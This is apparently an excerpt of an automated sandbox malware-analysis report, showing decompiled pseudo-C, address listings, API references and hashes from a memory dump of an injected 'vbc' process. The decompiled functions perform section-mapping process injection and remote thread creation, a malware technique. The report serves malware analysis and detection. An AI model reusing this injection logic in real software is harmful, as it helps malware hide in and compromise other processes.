													__eax = __ebx;
													__ebx = _t16;
													asm("sti");
													asm("retf");
													asm("sti");
													asm("sti");
													__eflags = __eax & 0x0491abaa;
													goto L0;
												}
											}
										}
										goto L107;
									}
								}
								L6:
								_t6 = __ebp - 0x77;
								 *_t6 =  *(__ebp - 0x77) + __dl;
								__eflags =  *_t6;
							} else {
								L34:
								asm("rol byte [0xeeaf439f], 0xfb");
								asm("sti");
								asm("adc dh, bh");
								0xf710();
								goto L35;
							}
						}
						L107:
					}
					L16:
					if (__eflags < 0) goto L5;
					__esi = 0xefb6700f;
				}
				L35:
				__eflags =  *(_t116 - 0x7f) & 0xfb76428e;
				asm("sti");
				asm("sti");
				asm("adc dh, bh");
				asm("int3");
				__eflags = _t195 &  *_t116;
				_push(cs);
				if(__eflags > 0) {
					asm("pushad");
					_push(_t162);
					_push(_t226);
					_push(_t214);
					_t168 = 0x373;
					L004012ED(0x161c, _t162, _t168, _t214, _t226, __eflags);
					_t163 =  *((intOrPtr*)(_t242 + 8));
					_t215 = 0;
					 *(_t242 - 0x34) = 0;
					__eflags = gs;
					if(gs != 0) {
						_t31 = _t242 - 0x34;
						 *_t31 =  *(_t242 - 0x34) + 1;
						__eflags =  *_t31;
					}
					while(1) {
						_t120 =  *((intOrPtr*)(_t163 + 0x48))();
						__eflags = _t120;
						if(_t120 != 0) {
							break;
						}
						 *((intOrPtr*)(_t163 + 0x1c))(0x3e8);
					}
					 *(_t242 - 0x5c) = _t120;
					_t227 = _t242 - 0x60;
					 *_t227 = _t215;
					 *((intOrPtr*)(_t163 + 0x4c))(_t120, _t227);
					_t123 =  *_t227;
					__eflags = _t123;
					if(__eflags != 0) {
						_t170 = _t242 - 0x30;
						 *_t170 = _t123;
						_t170[1] = _t215;
						_t227 = _t242 - 0x28;
						 *((intOrPtr*)(_t163 + 0x10))(_t227, 0x18);
						 *_t227 = 0x18;
						__eflags =  *((intOrPtr*)(_t163 + 0x70))(_t242 - 0x10, 0x40, _t227, _t242 - 0x30);
						if(__eflags == 0) {
							__eflags = NtDuplicateObject( *(_t242 - 0x10), 0xffffffff, 0xffffffff, _t242 - 0xc, _t215, _t215, 2);
							if(__eflags == 0) {
								 *(_t242 - 8) = _t215;
								_t131 = _t242 - 0x50;
								 *(_t131 + 4) = _t215;
								 *_t131 = 0x5000;
								_t229 = _t242 - 0x54;
								_t132 = NtCreateSection(_t229, 6, _t215, _t131, 4, 0x8000000, _t215);
								__eflags = _t132;
								if(_t132 == 0) {
									 *_t53 =  *(_t242 - 0x50);
									_t156 = _t242 - 0x44;
									 *_t156 = _t215;
									_t157 = NtMapViewOfSection( *_t229, 0xffffffff, _t156, _t215, _t215, _t215, _t242 - 0x38, 1, _t215, 4);
									__eflags = _t157;
									if(_t157 == 0) {
										_t158 = _t242 - 0x3c;
										 *_t158 = _t215;
										_t159 = NtMapViewOfSection( *_t229,  *(_t242 - 0xc), _t158, _t215, _t215, _t215, _t242 - 0x38, 1, _t215, 4);
										__eflags = _t159;
										if(_t159 == 0) {
											_t240 =  *(_t242 - 0x44);
											 *((intOrPtr*)(_t163 + 0x20))(_t215, _t240, 0x104);
											 *((intOrPtr*)(_t240 + 0x208)) =  *((intOrPtr*)(_t242 + 0x14));
											_t65 = _t242 - 8;
											 *_t65 =  *(_t242 - 8) + 1;
											__eflags =  *_t65;
										}
									}
								}
								_t133 = _t242 - 0x50;
								 *(_t133 + 4) = _t215;
								 *_t133 =  *((intOrPtr*)(_t242 + 0x10)) + 0x10000;
								_t227 = _t242 - 0x58;
								__eflags = NtCreateSection(_t227, 0xe, _t215, _t133, 0x40, 0x8000000, _t215);
								if(__eflags == 0) {
									__eflags =  *(_t242 - 8);
									if(__eflags != 0) {
										 *_t74 =  *(_t242 - 0x50);
										_t135 = _t242 - 0x48;
										 *_t135 = _t215;
										__eflags = NtMapViewOfSection( *_t227, 0xffffffff, _t135, _t215, _t215, _t215, _t242 - 0x38, 1, _t215, 4);
										if(__eflags == 0) {
											_t137 = _t242 - 0x40;
											 *_t137 = _t215;
											_t138 = NtMapViewOfSection( *_t227,  *(_t242 - 0xc), _t137, _t215, _t215, _t215, _t242 - 0x38, 1, _t215, 0x20);
											__eflags = _t138;
											if(__eflags == 0) {
												L58();
												if(__eflags == 0 && __eflags != 0) {
													__eflags = (_t138 | 0x00000006) - 1;
												}
												_t248 = _t245 + 4;
												_t198 = 0x2260;
												_t139 = _t198;
												_t199 = _t198 << 5;
												_t200 = _t199 + _t139;
												asm("lodsb");
												_t201 = _t200;
												asm("loop 0xffffffc8");
												_t202 = _t201 ^ 0xd2aedb1b;
												_t245 = _t248 - _t202;
												_t234 =  *((intOrPtr*)(_t242 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t242 + 0xc))));
												_t177 =  *(_t234 + 6) & 0x0000ffff;
												_push(_t234);
												_t203 = _t234;
												__eflags =  *(_t242 - 0x34);
												if( *(_t242 - 0x34) == 0) {
													_t204 = _t203 + 0xf8;
													__eflags = _t204;
												} else {
													_t204 = _t203 + 0x108;
												}
												_push(_t177);
												_t178 =  *(_t204 + 0x10);
												__eflags = _t178;
												if(_t178 != 0) {
													_t239 =  *((intOrPtr*)(_t204 + 0x14)) +  *((intOrPtr*)(_t242 + 0xc));
													__eflags = _t239;
													memcpy( *((intOrPtr*)(_t204 + 0xc)) +  *(_t242 - 0x48), _t239, _t178);
													_t245 = _t245 + 0xc;
												}
												asm("loop 0xffffffe6");
												_pop(_t227);
												__eflags =  *(_t242 - 0x34);
												if(__eflags == 0) {
													_push(_t227);
													_t207 = _t227[0xd] -  *(_t242 - 0x40);
													_t237 = _t227[0x28] +  *(_t242 - 0x48);
													__eflags = _t237;
													while(1) {
														__eflags =  *_t237;
														if( *_t237 == 0) {
															break;
														}
														_t217 =  *_t237;
														_t237 = _t237 + 8;
														asm("lodsw");
														__eflags = 0;
														if(0 != 0) {
															 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t207;
															__eflags =  *(0 +  *(_t242 - 0x48) + _t217);
														}
														asm("loop 0xffffffe9");
													}
													_pop(_t227);
													_t215 = 0;
													__eflags = 0;
													_t141 = _t242 - 4;
													 *_t141 = 0;
													 *((intOrPtr*)(_t163 + 0x98))( *(_t242 - 0xc), 0, 0, 0, 0, 0, _t227[0xa] +  *(_t242 - 0x40),  *(_t242 - 0x3c), _t141, 0);
												} else {
													L91();
													_pop(_t218);
													_t215 = _t218 - 0x188d;
													 *((intOrPtr*)(_t215 + 0x18c1)) = _t215 + 0x2d60;
													L0040137F(_t163, _t215 + 0x18c1, _t215, _t227, __eflags, _t215 + 0x2d60, 0x1ad);
													0x33();
													 *((intOrPtr*)(_t215 + 0x18e6)) = _t215 + 0x2db0;
													0x33();
												}
											}
										}
									}
								}
							}
						}
					}
					_push(0x161c);
					_t124 =  *_t245;
					return L004012ED(_t124, _t163, 0x373, _t215, _t227, __eflags);
				} else {
					__eflags =  *_t226 & 0x458b0404;
					asm("hlt");
					return _t116;
				}
				goto L107;
			}

0x0040158a
0x0040158a
0x0040158a
0x0040158a
0x0040158a
0x0040158a
0x0040158b
0x0040158d
0x0040158f
0x00000000
0x00000000
0x00401591
0x00401591
0x00401593
0x00401595
0x00401598
0x00401599
0x0040159e
0x0040159e
0x004015a0
0x004015a0
0x004015a0
0x004015a1
0x00000000
0x00000000
0x004015a3
0x004015a3
0x004015a4
0x00000000
0x004015a6
0x004015a6
0x004015a6
0x004015a8
0x004015aa
0x004015ad
0x004015ae
0x004015af
0x004015b0
0x004015b1
0x004015b2
0x004015b3
0x004015b6
0x004015b6
0x004015b8
0x004015ba
0x0040156d
0x0040156d
0x0040156d
0x0040156f
0x0040156f
0x0040156f
0x0040156f
0x00401571
0x00000000
0x00000000
0x00401573
0x00401573
0x00401573
0x00000000
0x00401574
0x00401576
0x00401526
0x00401526
0x00401527
0x00401529
0x0040152a
0x00000000
0x00401578
0x00401578
0x00401578
0x00401579
0x00000000
0x0040157b
0x0040157b
0x0040157b
0x0040153b
0x0040153b
0x00401535
0x00401547
0x0040154f
0x00401554
0x004014fc
0x004014fc
0x00401503
0x00401556
0x00401556
0x00401556
0x00000000
0x00401556
0x0040157d
0x0040157d
0x0040157d
0x0040157f
0x0040157f
0x00401582
0x00401582
0x00401582
0x00401582
0x00401583
0x00401584
0x00401585
0x00401586
0x00401587
0x00000000
0x00401587
0x0040157b
0x00401579
0x00000000
0x00401576
0x00401574
0x00401521
0x00401521
0x00401521
0x00401521
0x004015bc
0x004015bc
0x004015bc
0x004015c3
0x004015c4
0x004015c6
0x00000000
0x004015c6
0x004015ba
0x00000000
0x004015a4
0x00401559
0x00401559
0x0040155a
0x0040155a
0x004015cc
0x004015cc
0x004015d3
0x004015d4
0x004015d5
0x004015d7
0x004015d8
0x004015da
0x004015db
0x004015f0
0x004015f1
0x004015f2
0x004015f3
0x0040160f
0x00401617
0x0040161c
0x0040161f
0x00401621
0x00401627
0x0040162a
0x0040162c
0x0040162c
0x0040162c
0x0040162c
0x0040162f
0x0040162f
0x00401632
0x00401634
0x00000000
0x00000000
0x00401956
0x00401956
0x0040163a
0x0040163d
0x00401640
0x00401644
0x00401647
0x00401649
0x0040164b
0x00401651
0x00401654
0x00401656
0x00401659
0x0040165f
0x00401662
0x00401678
0x0040167a
0x00401695
0x00401697
0x0040169d
0x004016a0
0x004016a3
0x004016a6
0x004016ac
0x004016bc
0x004016bf
0x004016c1
0x004016c6
0x004016c9
0x004016cc
0x004016df
0x004016e2
0x004016e4
0x004016e6
0x004016e9
0x004016fd
0x00401700
0x00401702
0x00401704
0x0040170e
0x00401714
0x0040171a
0x0040171a
0x0040171a
0x0040171a
0x00401702
0x004016e4
0x0040171d
0x00401729
0x0040172c
0x0040172e
0x00401741
0x00401743
0x00401749
0x0040174d
0x00401756
0x00401759
0x0040175c
0x00401772
0x00401774
0x0040177a
0x0040177d
0x00401791
0x00401794
0x00401796
0x0040179c
0x004017a1
0x004017a8
0x004017a8
0x004017a9
0x004017ea
0x004017fa
0x00401805
0x0040180f
0x0040181d
0x00401825
0x0040182a
0x00401833
0x0040183c
0x00401848
0x0040184a
0x0040184e
0x0040184f
0x00401851
0x00401855
0x0040185f
0x0040185f
0x00401857
0x00401857
0x00401857
0x00401865
0x00401866
0x00401869
0x0040186b
0x00401876
0x00401876
0x00401879
0x00401879
0x00401879
0x0040187f
0x00401881
0x00401882
0x00401886
0x004018ee
0x004018f2
0x004018fd
0x004018fd
0x00401900
0x00401900
0x00401903
0x00000000
0x00000000
0x00401905
0x0040190f
0x00401914
0x00401916
0x0040191b
0x00401927
0x00401927
0x00401927
0x00401929
0x00401929
0x0040192d
0x00401934
0x00401934
0x00401936
0x00401939
0x00401949
0x00401888
0x00401888
0x0040188d
0x0040188e
0x004018a4
0x004018b3
0x004018c0
0x004018d7
0x004018e5
0x004018e5
0x00401886
0x00401796
0x00401774
0x0040174d
0x00401743
0x00401697
0x0040167a
0x00401966
0x0040196b
0x00401993
0x004015dd
0x004015dd
0x004015e3
0x004015e8
0x004015e8
0x00000000

Memory Dump Source

Source File: 00000006.00000002.1062085430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47d0989fea8294b14a6dc720ca75137b93c28906a5ee7e3f13ef78b41e45cdf0
Instruction ID: 69b6f79ff3be7928d4a27c65b721351c97b8d1c4a2a9cb26b6f1864a1e830558
Opcode Fuzzy Hash: 47d0989fea8294b14a6dc720ca75137b93c28906a5ee7e3f13ef78b41e45cdf0
Instruction Fuzzy Hash: 4981C0B1900205BFEB208F95CC49FEB7BB9FF85710F14012AF952BA1E0D2789902CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015EB Relevance: 10.7, APIs: 7, Instructions: 194
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E004015EB(void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				long _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				long _v56;
				long _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				void* _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t89;
				void* _t92;
				intOrPtr _t93;
				struct _GUID _t100;
				struct _GUID _t102;
				PVOID* _t104;
				PVOID* _t106;
				void* _t108;
				intOrPtr* _t110;
				PVOID* _t125;
				PVOID* _t127;
				void* _t131;
				intOrPtr _t132;
				void* _t134;
				void** _t136;
				signed int _t143;
				int _t144;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				void* _t166;
				intOrPtr* _t167;
				void* _t170;
				void* _t177;
				long _t178;
				intOrPtr _t180;
				void* _t181;
				void* _t188;
				HANDLE* _t189;
				HANDLE* _t191;
				void* _t196;
				intOrPtr* _t199;
				intOrPtr _t202;
				intOrPtr* _t203;
				void* _t205;
				long _t220;

				asm("pushad");
				_push(_t131);
				_push(_t188);
				_push(_t177);
				_t134 = 0x373;
				L004012ED(0x161c, _t131, _t134, _t177, _t188, __eflags);
				_t132 = _a4;
				_t178 = 0;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
					_t89 =  *((intOrPtr*)(_t132 + 0x48))();
					if(_t89 != 0) {
						break;
					}
					 *((intOrPtr*)(_t132 + 0x1c))(0x3e8);
				}
				_v96 = _t89;
				_t189 =  &_v100;
				 *_t189 = _t178;
				 *((intOrPtr*)(_t132 + 0x4c))(_t89, _t189);
				_t92 =  *_t189;
				if(_t92 != 0) {
					_t136 =  &_v52;
					 *_t136 = _t92;
					_t136[1] = _t178;
					_t189 =  &_v44;
					 *((intOrPtr*)(_t132 + 0x10))(_t189, 0x18);
					 *_t189 = 0x18;
					_push( &_v52);
					_push(_t189);
					_push(0x40);
					_push( &_v20);
					if( *((intOrPtr*)(_t132 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t178, _t178, 2) == 0) {
						_v12 = _t178;
						_t100 =  &_v84;
						 *(_t100 + 4) = _t178;
						 *_t100 = 0x5000;
						_t191 =  &_v88;
						if(NtCreateSection(_t191, 6, _t178, _t100, 4, 0x8000000, _t178) == 0) {
							_push(_v84);
							_pop( *_t25);
							_t125 =  &_v72;
							 *_t125 = _t178;
							if(NtMapViewOfSection( *_t191, 0xffffffff, _t125, _t178, _t178, _t178,  &_v60, 1, _t178, 4) == 0) {
								_t127 =  &_v64;
								 *_t127 = _t178;
								if(NtMapViewOfSection( *_t191, _v16, _t127, _t178, _t178, _t178,  &_v60, 1, _t178, 4) == 0) {
									_t202 = _v72;
									 *((intOrPtr*)(_t132 + 0x20))(_t178, _t202, 0x104);
									 *((intOrPtr*)(_t202 + 0x208)) = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t102 =  &_v84;
						 *(_t102 + 4) = _t178;
						 *_t102 = _a12 + 0x10000;
						_t189 =  &_v92;
						if(NtCreateSection(_t189, 0xe, _t178, _t102, 0x40, 0x8000000, _t178) == 0 && _v12 != 0) {
							_push(_v84);
							_pop( *_t46);
							_t104 =  &_v76;
							 *_t104 = _t178;
							if(NtMapViewOfSection( *_t189, 0xffffffff, _t104, _t178, _t178, _t178,  &_v60, 1, _t178, 4) == 0) {
								_t106 =  &_v68;
								 *_t106 = _t178;
								_t220 = NtMapViewOfSection( *_t189, _v16, _t106, _t178, _t178, _t178,  &_v60, 1, _t178, 0x20);
								if(_t220 == 0) {
									L22();
									if(_t220 == 0 && _t220 != 0) {
									}
									_t205 = _t203 + 4;
									_t161 = 0x2260;
									_t108 = _t161;
									_t162 = _t161 << 5;
									_t163 = _t162 + _t108;
									asm("lodsb");
									_t164 = _t163;
									asm("loop 0xffffffc8");
									_t165 = _t164 ^ 0xd2aedb1b;
									_t203 = _t205 - _t165;
									_t196 = _a8 +  *_a8;
									_t143 =  *(_t196 + 6) & 0x0000ffff;
									_push(_t196);
									_t166 = _t196;
									if(_v56 == 0) {
										_t167 = _t166 + 0xf8;
										__eflags = _t167;
									} else {
										_t167 = _t166 + 0x108;
									}
									_push(_t143);
									_t144 =  *(_t167 + 0x10);
									if(_t144 != 0) {
										memcpy( *((intOrPtr*)(_t167 + 0xc)) + _v76,  *((intOrPtr*)(_t167 + 0x14)) + _a8, _t144);
										_t203 = _t203 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t189);
									_t225 = _v56;
									if(_v56 == 0) {
										_push(_t189);
										_t170 = _t189[0xd] - _v68;
										_t199 = _t189[0x28] + _v76;
										__eflags = _t199;
										while(1) {
											__eflags =  *_t199;
											if( *_t199 == 0) {
												break;
											}
											_t180 =  *_t199;
											_t199 = _t199 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t170;
												__eflags =  *((intOrPtr*)(0 + _v76 + _t180));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t189);
										_t178 = 0;
										__eflags = 0;
										_t110 =  &_v8;
										 *_t110 = 0;
										 *((intOrPtr*)(_t132 + 0x98))(_v16, 0, 0, 0, 0, 0, _t189[0xa] + _v68, _v64, _t110, 0);
									} else {
										L55();
										_pop(_t181);
										_t178 = _t181 - 0x188d;
										 *((intOrPtr*)(_t178 + 0x18c1)) = _t178 + 0x2d60;
										L0040137F(_t132, _t178 + 0x18c1, _t178, _t189, _t225, _t178 + 0x2d60, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t178 + 0x18e6)) = _t178 + 0x2db0;
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x161c);
				_t93 =  *_t203;
				return L004012ED(_t93, _t132, 0x373, _t178, _t189, _t225);
			}

0x004015f0
0x004015f1
0x004015f2
0x004015f3
0x0040160f
0x00401617
0x0040161c
0x0040161f
0x00401621
0x0040162a
0x0040162c
0x0040162c
0x0040162f
0x0040162f
0x00401634
0x00000000
0x00000000
0x00401956
0x00401956
0x0040163a
0x0040163d
0x00401640
0x00401644
0x00401647
0x0040164b
0x00401651
0x00401654
0x00401656
0x00401659
0x0040165f
0x00401662
0x00401670
0x00401671
0x00401672
0x00401674
0x0040167a
0x0040169d
0x004016a0
0x004016a3
0x004016a6
0x004016ac
0x004016c1
0x004016c3
0x004016c6
0x004016c9
0x004016cc
0x004016e4
0x004016e6
0x004016e9
0x00401702
0x00401704
0x0040170e
0x00401714
0x0040171a
0x0040171a
0x00401702
0x004016e4
0x0040171d
0x00401729
0x0040172c
0x0040172e
0x00401743
0x00401753
0x00401756
0x00401759
0x0040175c
0x00401774
0x0040177a
0x0040177d
0x00401794
0x00401796
0x0040179c
0x004017a1
0x004017a1
0x004017a9
0x004017ea
0x004017fa
0x00401805
0x0040180f
0x0040181d
0x00401825
0x0040182a
0x00401833
0x0040183c
0x00401848
0x0040184a
0x0040184e
0x0040184f
0x00401855
0x0040185f
0x0040185f
0x00401857
0x00401857
0x00401857
0x00401865
0x00401866
0x0040186b
0x00401879
0x00401879
0x00401879
0x0040187f
0x00401881
0x00401882
0x00401886
0x004018ee
0x004018f2
0x004018fd
0x004018fd
0x00401900
0x00401900
0x00401903
0x00000000
0x00000000
0x00401905
0x0040190f
0x00401914
0x00401916
0x0040191b
0x00401927
0x00401927
0x00401927
0x00401929
0x00401929
0x0040192d
0x00401934
0x00401934
0x00401936
0x00401939
0x00401949
0x00401888
0x00401888
0x0040188d
0x0040188e
0x004018a4
0x004018b3
0x004018c0
0x004018d7
0x004018e5
0x004018e5
0x00401886
0x00401796
0x00401774
0x00401743
0x0040167a
0x00401966
0x0040196b
0x00401993

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040168F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BC
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016DF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040176F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401791

Memory Dump Source

Source File: 00000006.00000002.1062085430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 5fac0892613a86f22634b628dffdff3b5e5ae0c775b9e6e23530ba081ea501fe
Instruction ID: c1e637f4ef0a5dc8081c2cbe7263db80b5b9d5f577230ae5619d48aca56ccce2
Opcode Fuzzy Hash: 5fac0892613a86f22634b628dffdff3b5e5ae0c775b9e6e23530ba081ea501fe
Instruction Fuzzy Hash: F4515EB4900249BBEB208F95CC49FEF7BB8EF81B10F14016AF911BA2E5D7759901CB25

Uniqueness

Uniqueness Score: -1.00%

Function 004015F6 Relevance: 10.7, APIs: 7, Instructions: 169
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E004015F6(void* __ebx, void* __edi, void* __eflags) {
				intOrPtr _t89;
				void* _t92;
				intOrPtr _t93;
				struct _GUID _t100;
				struct _GUID _t102;
				PVOID* _t104;
				PVOID* _t106;
				void* _t108;
				intOrPtr* _t110;
				PVOID* _t125;
				PVOID* _t127;
				intOrPtr _t132;
				void* _t134;
				void** _t136;
				signed int _t143;
				int _t144;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				void* _t166;
				intOrPtr* _t167;
				void* _t170;
				long _t178;
				intOrPtr _t180;
				void* _t181;
				void* _t188;
				HANDLE* _t189;
				HANDLE* _t191;
				void* _t196;
				intOrPtr* _t199;
				void* _t202;
				void* _t203;
				void* _t205;
				intOrPtr* _t206;
				void* _t209;
				long _t224;

				_t206 = _t205 - 1;
				_pop(_t188);
				asm("cmpsd");
				_t134 = 0x373;
				L004012ED(0x161c, __ebx, _t134, __edi, _t188, __eflags);
				_t132 =  *((intOrPtr*)(_t203 + 8));
				_t178 = 0;
				 *((intOrPtr*)(_t203 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
				}
				while(1) {
					_t89 =  *((intOrPtr*)(_t132 + 0x48))();
					if(_t89 != 0) {
						break;
					}
					 *((intOrPtr*)(_t132 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t203 - 0x5c)) = _t89;
				_t189 = _t203 - 0x60;
				 *_t189 = _t178;
				 *((intOrPtr*)(_t132 + 0x4c))(_t89, _t189);
				_t92 =  *_t189;
				if(_t92 != 0) {
					_t136 = _t203 - 0x30;
					 *_t136 = _t92;
					_t136[1] = _t178;
					_t189 = _t203 - 0x28;
					 *((intOrPtr*)(_t132 + 0x10))(_t189, 0x18);
					 *_t189 = 0x18;
					_push(_t203 - 0x30);
					_push(_t189);
					_push(0x40);
					_push(_t203 - 0x10);
					if( *((intOrPtr*)(_t132 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, _t178, _t178, 2) == 0) {
						 *(_t203 - 8) = _t178;
						_t100 = _t203 - 0x50;
						 *(_t100 + 4) = _t178;
						 *_t100 = 0x5000;
						_t191 = _t203 - 0x54;
						if(NtCreateSection(_t191, 6, _t178, _t100, 4, 0x8000000, _t178) == 0) {
							 *_t25 =  *(_t203 - 0x50);
							_t125 = _t203 - 0x44;
							 *_t125 = _t178;
							if(NtMapViewOfSection( *_t191, 0xffffffff, _t125, _t178, _t178, _t178, _t203 - 0x38, 1, _t178, 4) == 0) {
								_t127 = _t203 - 0x3c;
								 *_t127 = _t178;
								if(NtMapViewOfSection( *_t191,  *(_t203 - 0xc), _t127, _t178, _t178, _t178, _t203 - 0x38, 1, _t178, 4) == 0) {
									_t202 =  *(_t203 - 0x44);
									 *((intOrPtr*)(_t132 + 0x20))(_t178, _t202, 0x104);
									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
									 *(_t203 - 8) =  *(_t203 - 8) + 1;
								}
							}
						}
						_t102 = _t203 - 0x50;
						 *(_t102 + 4) = _t178;
						 *_t102 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
						_t189 = _t203 - 0x58;
						if(NtCreateSection(_t189, 0xe, _t178, _t102, 0x40, 0x8000000, _t178) == 0 &&  *(_t203 - 8) != 0) {
							 *_t46 =  *(_t203 - 0x50);
							_t104 = _t203 - 0x48;
							 *_t104 = _t178;
							if(NtMapViewOfSection( *_t189, 0xffffffff, _t104, _t178, _t178, _t178, _t203 - 0x38, 1, _t178, 4) == 0) {
								_t106 = _t203 - 0x40;
								 *_t106 = _t178;
								_t224 = NtMapViewOfSection( *_t189,  *(_t203 - 0xc), _t106, _t178, _t178, _t178, _t203 - 0x38, 1, _t178, 0x20);
								if(_t224 == 0) {
									L20();
									if(_t224 == 0 && _t224 != 0) {
									}
									_t209 = _t206 + 4;
									_t161 = 0x2260;
									_t108 = _t161;
									_t162 = _t161 << 5;
									_t163 = _t162 + _t108;
									asm("lodsb");
									_t164 = _t163;
									asm("loop 0xffffffc8");
									_t165 = _t164 ^ 0xd2aedb1b;
									_t206 = _t209 - _t165;
									_t196 =  *((intOrPtr*)(_t203 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0xc))));
									_t143 =  *(_t196 + 6) & 0x0000ffff;
									_push(_t196);
									_t166 = _t196;
									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
										_t167 = _t166 + 0xf8;
										__eflags = _t167;
									} else {
										_t167 = _t166 + 0x108;
									}
									_push(_t143);
									_t144 =  *(_t167 + 0x10);
									if(_t144 != 0) {
										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t203 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t203 + 0xc)), _t144);
										_t206 = _t206 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t189);
									_t229 =  *((intOrPtr*)(_t203 - 0x34));
									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
										_push(_t189);
										_t170 = _t189[0xd] -  *(_t203 - 0x40);
										_t199 = _t189[0x28] +  *(_t203 - 0x48);
										__eflags = _t199;
										while(1) {
											__eflags =  *_t199;
											if( *_t199 == 0) {
												break;
											}
											_t180 =  *_t199;
											_t199 = _t199 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t170;
												__eflags =  *((intOrPtr*)(0 +  *(_t203 - 0x48) + _t180));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t189);
										_t178 = 0;
										__eflags = 0;
										_t110 = _t203 - 4;
										 *_t110 = 0;
										 *((intOrPtr*)(_t132 + 0x98))( *(_t203 - 0xc), 0, 0, 0, 0, 0, _t189[0xa] +  *(_t203 - 0x40),  *(_t203 - 0x3c), _t110, 0);
									} else {
										L53();
										_pop(_t181);
										_t178 = _t181 - 0x188d;
										 *((intOrPtr*)(_t178 + 0x18c1)) = _t178 + 0x2d60;
										L0040137F(_t132, _t178 + 0x18c1, _t178, _t189, _t229, _t178 + 0x2d60, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t178 + 0x18e6)) = _t178 + 0x2db0;
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x161c);
				_t93 =  *_t206;
				return L004012ED(_t93, _t132, 0x373, _t178, _t189, _t229);
			}

0x004015f6
0x004015f7
0x004015f8
0x0040160f
0x00401617
0x0040161c
0x0040161f
0x00401621
0x0040162a
0x0040162c
0x0040162c
0x0040162f
0x0040162f
0x00401634
0x00000000
0x00000000
0x00401956
0x00401956
0x0040163a
0x0040163d
0x00401640
0x00401644
0x00401647
0x0040164b
0x00401651
0x00401654
0x00401656
0x00401659
0x0040165f
0x00401662
0x00401670
0x00401671
0x00401672
0x00401674
0x0040167a
0x0040169d
0x004016a0
0x004016a3
0x004016a6
0x004016ac
0x004016c1
0x004016c6
0x004016c9
0x004016cc
0x004016e4
0x004016e6
0x004016e9
0x00401702
0x00401704
0x0040170e
0x00401714
0x0040171a
0x0040171a
0x00401702
0x004016e4
0x0040171d
0x00401729
0x0040172c
0x0040172e
0x00401743
0x00401756
0x00401759
0x0040175c
0x00401774
0x0040177a
0x0040177d
0x00401794
0x00401796
0x0040179c
0x004017a1
0x004017a1
0x004017a9
0x004017ea
0x004017fa
0x00401805
0x0040180f
0x0040181d
0x00401825
0x0040182a
0x00401833
0x0040183c
0x00401848
0x0040184a
0x0040184e
0x0040184f
0x00401855
0x0040185f
0x0040185f
0x00401857
0x00401857
0x00401857
0x00401865
0x00401866
0x0040186b
0x00401879
0x00401879
0x00401879
0x0040187f
0x00401881
0x00401882
0x00401886
0x004018ee
0x004018f2
0x004018fd
0x004018fd
0x00401900
0x00401900
0x00401903
0x00000000
0x00000000
0x00401905
0x0040190f
0x00401914
0x00401916
0x0040191b
0x00401927
0x00401927
0x00401927
0x00401929
0x00401929
0x0040192d
0x00401934
